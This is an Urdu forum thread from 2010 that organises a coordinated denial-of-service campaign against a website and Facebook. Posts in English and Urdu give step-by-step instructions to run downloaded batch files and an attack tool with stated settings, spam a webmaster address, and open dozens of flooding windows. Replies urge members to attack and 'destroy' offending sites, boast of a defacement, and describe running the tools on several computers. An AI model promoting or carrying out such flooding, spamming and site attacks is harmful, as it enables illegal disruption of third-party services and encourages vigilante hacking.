| گپ شپ کسی بھی مو ضوع پر گفتگو کرئے |
![]() |
|
|
LinkBack | موضوع کے اختیارات | موضوع کی درجہ بندی | ظاہری انداز |
|
|
#1 | |||
|
||||
|
مناظر: 198
|
||||
| 2 قاری/قارئین نے خرم شہزاد خرم کا شکریہ ادا کیا | راجہ اکرام (19-05-10), عبداللہ آدم (20-05-10) |
|
|
#2 |
|
ناظم اعلی
![]() تاریخ شمولیت: Jun 2007
عمر: 30
مراسلات: 12,482
کمائي: 8,120,880,613,354
شکریہ: 7,484
3,660 مراسلہ میں 9,157 بارشکریہ ادا کیا گیا
|
ANTI-DRAW-MUHAMMAD (P.B.U.H) -DAY
Things to do 1: Download this bat file and run 2: Download this attack file install. PTA has blocked this site and this wont work in Pakistan now. Instead do step three and four Run tester from desktop ( and click start and minimize ) setting that would work for most user - timeout: 1000 - requests : 3 3: Send as many spam mails as you can to webmaster@drawmuhammadday.com 4: Download this second batch file extract it and open either start20 or start50 and minimize windows. WE ALREADY TOOK IT DOWN MANY TIMES WE WILL TAKE IT DOWN AGAIN Update : Another site drawmohammed.com has been hacked by muslims hackers have a look at Mirror linkThe first link keeps sending ping requests with large packet size to facebook And about second, what it does it it keeps opening drawmuhammadday.com again and again. every site has a limited amount of bandwidth available if the site gets huge traffic the bandwidth finishes and it goes down. we are trying to finish its bandwidth so that it can be taken down currently the site goes down and comes back... however if we can keep this up it will be gone for good Thank you for your help. More Ways you can Help: Forward it to your friends via SMS Tweet about it SPREAD THE WORD AND SHARE IT WITH YOUR FRIENDS event link : https://www.facebook.com/event.php?eid=123333424358094 IF you own some any group on facebook or if you run a blog please share this site. Help us! For your questions please post here or email to taha@tahasoft.net Regards: Taha Contact Me: http://www.facebook.com/taharox |
|
|
|
| 4 قاری/قارئین نے خرم شہزاد خرم کا شکریہ ادا کیا |
|
|
#3 |
|
Senior Member
![]() تاریخ شمولیت: Sep 2007
مقام: پاکستان
عمر: 28
مراسلات: 2,784
کمائي: 41,227
شکریہ: 2,665
1,641 مراسلہ میں 3,771 بارشکریہ ادا کیا گیا
|
مسلمان ہیکربھائیوں گستاخی کرنے والی ویب سائٹس پر تابڑتوڑ حملے کرو۔ تباہ کر دو تمام گستاخی کرنے والی ویب سائٹس کو
__________________
http://farhandanish.blogspot.com
http://farhandanish.tk |
|
|
|
| 4 قاری/قارئین نے فرحان دانش کا شکریہ ادا کیا |
|
|
#4 |
|
Senior Member
![]() تاریخ شمولیت: Jan 2010
مراسلات: 456
کمائي: 10,008
شکریہ: 147
332 مراسلہ میں 834 بارشکریہ ادا کیا گیا
|
مسلمان ہیکربھائیوں گستاخی کرنے والی ویب سائٹس پر تابڑتوڑ حملے کرو۔ تباہ کر دو تمام گستاخی کرنے والی ویب سائٹس کو
__________________ فرحان دانش شریف |
|
|
|
| 2 قاری/قارئین نے شریف کا شکریہ ادا کیا | خرم شہزاد خرم (19-05-10), راجہ اکرام (19-05-10) |
|
|
#5 |
|
ناظم اعلی
![]() تاریخ شمولیت: Jun 2007
عمر: 30
مراسلات: 12,482
کمائي: 8,120,880,613,354
شکریہ: 7,484
3,660 مراسلہ میں 9,157 بارشکریہ ادا کیا گیا
|
فیس بک پر 20 مئی کو ایک مکروہ فعل ہونے جا رہا ہے جس سے شاید آپ تمام احباب بخوبی واقف ہوں گے۔ اس مکروہ فعل کو روکنے کے لئے ہرمسلم نوجوان اپنے طور پر کاوشیں کر رہا ہے ایک اور نوجوان نے اس ضمن میں کاوش کی ہے جس میں چند تکنیکی طریقوں سے فیس بک اور اس مکروہ فعل میں ملوث دیگر سائیٹس کو نقصان پہنچایا جا سکتا ہے وہی طریقے نیچے درج ہیں۔
طریقے: 1۔ سب سے پہلےاس لنک پر موجود Bat فائل ڈاونلوڈ کر لیں اور اسے چلائیں۔ 2۔ یہ ویب سائیٹس پر حملہ کرنے والی خودکار فائل ڈاونلوڈ کیجئےاور اسے چلا دیں۔( طریقہ بتانے والے نے لکھا ہے کہ شاید یہ سائیٹ PTA نے پاکستان میں بلاک کر دی تھی لیکن میرے پاس کھل رہی ہے) (اگر یہ آپ کے پاس بلاک ہو تو اسے چھوڑ دیں اور طریقہ نمبر 3 اور 4 پر عمل کیجئے)۔اپنے ڈیسک ٹاپ پر سے Tester نامی فائل چلائیں سٹارٹ پر کلک کرنے کے بعد اس فائل کو Minimize کر دیں۔ اس کی جو سیٹنگ عام طور پر صارفین کےلئے کام کرتی ہے وہ درج ذیل ہے۔ کوڈ: تمام منتخب کریں timeout: 1000 - requests : 3 3- جتنی زیادہ اسپیم میلز webmaster@drawmuhammadday.com پر بھیج سکتے ہیں بھیجتے رہئے۔ 4- یہ دوسری Batch فائل ڈاونلوڈ کیجئے اور اسے Extrat کرنے کے بعد Start20 یا Start50 نامی فائل چلایئے اور کھلنے والی ونڈوز Minimize کر دیجئے۔ (ہم اس طریقے سے پہلے ہی بیسیوں بار اس سائیٹ کو ڈاون کر چکےہیں اور مزید بھی اسے ڈاون کرتے رہیں گے) اپڈیٹ: ایک اور سائیٹ drawmohammed.com کو مسلمان ہیکرز نے ہیک کر لیا ہے۔اس کے ایک منعکس ربط پر نظر ڈالئے سارے طریقے کی وضاحت: پہلا لنک فیس بک پر بڑے پیمانے اور بڑے حجم کی Ping کی درخواستیں بھیجتا رہے گا اور دوسرا لنک بار بار drawmuhammadday.com کی سائیٹ کھولتا رہے گا۔ ہر سائیٹ کے پاس ایک محدود بینڈ وڈتھ ہوتی ہے اور اگر اس سائیٹ پر آمد بہت زیادہ ہو گی یعنی اسے بار بار کھولا جائے گا تو اس کی بینڈودتھ ختم ہو جائے گی اور سائیٹ ڈاون ہو جائے گی۔ ہم اس سائیٹ کی بینڈ وڈتھ کو ختم کرنے کی کاوش کر رہے ہیں تاکہ یہ سائیٹ ڈاون ہو جائے۔ اس وقت یہ سائیٹ ڈاون ہو چکی ہے لیکن یہ اور بینڈوڈتھ خرید کر پھر آ جائے گی لیکن اگر ہم نے اپنا عمل جاری رکھا تو یہ مستقل طور پر بند ہو جائے گی۔ آپ کی مدد کر شکریہ۔ اس ضمن میں مدد کرنے کے اور طریقے: اس طریقے کو ایس ایم ایس کے ذریعے اپنے دوستوں تک پہنچایئے تاکہ وہ یہ عمل کر سکیں۔ ٹوئیٹر پر اس بارے میں ٹوئیٹ تحریر کیجئے۔ اسے اپنے دوستوں سے شئیر کیجئے اور ساری دنیا میں پھیلا دیں۔ فیس بک پر اس ایوینٹ کا لنک یہ ہے۔ اگر آپ کا فیس بک پر کوئی گروپ ہے یا آپ کوئی بلاگ یا کوئی سائیٹ چلا رہے ہیں تو براہ مہربانی ہماری مدد کیجئے اور ان طریقوں کو پھیلانے میں ہماری مدد کیجئے۔ اپنے سوالات کے لئے یہاں پوسٹ لگائیں یا ہمیں اس ای میل ایڈریس پر میل کیجئے taha@tahasoft.net مخلص طحٰہ |
|
|
|
| 4 قاری/قارئین نے خرم شہزاد خرم کا شکریہ ادا کیا |
|
|
#6 |
|
Senior Member
![]() ![]() |
میں یہ بیٹ فائل چلا رہا ہوں لیکن مسلسل جواب آ رہا ہے، آپ حضرات بھی اسے چلائیے تا کہ اس پر رش بڑھے۔
شکریہ
__________________
عرفی تومیندیش ذغوغائے رقیباں - آواز سگاں کم نہ کند رزق گدارا میرا بلاگ | yasirimran.wordpress.com |
|
|
|
| 3 قاری/قارئین نے یاسر عمران مرزا کا شکریہ ادا کیا |
|
|
#7 |
|
Senior Member
![]() تاریخ شمولیت: Mar 2010
مراسلات: 844
کمائي: 16,155
شکریہ: 4,383
785 مراسلہ میں 2,220 بارشکریہ ادا کیا گیا
|
میں نے تو کل سے اون کیے ہے سارے کمپیوٹر
|
|
|
|
| 3 قاری/قارئین نے rabab کا شکریہ ادا کیا |
|
|
#8 |
|
ذیلی ناظم
![]() ![]() |
السلام علیکم
start 20والی فائل 20 فائلیں کھولتی ہے اور start 50 والی 50 فائلز کھولتی ہے اور یہ سب بار بار اس سائٹ کو میسج بھیجتی ہیں۔۔۔۔۔۔۔۔۔۔ ایک بات اور بھی ہے کہ اگر آپ دوبار 50 والی فائل کھولیں گے تو 100 فائلز کھل جائیں گی اور 20 والی دو دفعہ کھولنے سے 40۔۔۔۔۔۔۔۔۔۔۔ ایک بھائی نے کہا ہے کہ وہ 200 فائلز اکٹھی کھول کر اتیک کر رہا ہے۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔ آپ بھی جتنی زیادہ سے زیادہ فائلز کھول سکیں کھولیں۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔ والسلام ۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔ ۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔ عزت اللہ ہی کے لیے ہے اور رسول صلی اللہ علیہ وسلم لے لیے اور مومنوں کے لیے
__________________
قال الشيخ محمد نجيب المطيعي - رحمه الله- في تصوير طبيعة طريق المجاهد : "وإنما يجاهد المؤمن في الله جهاده، إن أخفق فإفادة أو أوذي فإرادة، أو نفي فريادة، أو سجن فعبادة، أو عاش فقيادة، أو مات فشهادة، فله الحسنى وزيادة" |
|
|
|
| عبداللہ آدم کا شکریہ ادا کیا گیا | rabab (20-05-10) |
|
|
#9 |
|
Senior Member
![]() تاریخ شمولیت: Mar 2010
مراسلات: 844
کمائي: 16,155
شکریہ: 4,383
785 مراسلہ میں 2,220 بارشکریہ ادا کیا گیا
|
السلام علیکم
اگر آپ نے تازہ اپ ڈیٹ پتہ کرنا ہے تو اس لنک پر جاوں جس آدمی نے وہ سایڈ بنائی ہے اسکا انٹریو سنو جو ابھی ابھی اس نے دیا ہے ایک بجے کا NIHAL کا جو شو آتا ہے اس میں اُس شیطان نے باتیں کی ہے یہ ہے وہ لنک |
|
|
|
| 2 قاری/قارئین نے rabab کا شکریہ ادا کیا | راجہ اکرام (20-05-10), طارق راحیل (21-05-10) |
![]() |
| Tags |
| .net, bandwidth, bits, blog, com, comes, desktop, download, net, pakistan, php, url, پہلے, ویب, چاہے, مکمل, مئی, معلومات, www, آیا, ایس ایم ایس, ابھی, جائیں, دیکھیں, سائیٹ |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| موضوع کے اختیارات | |
| ظاہری انداز | Rate This Thread |
|
|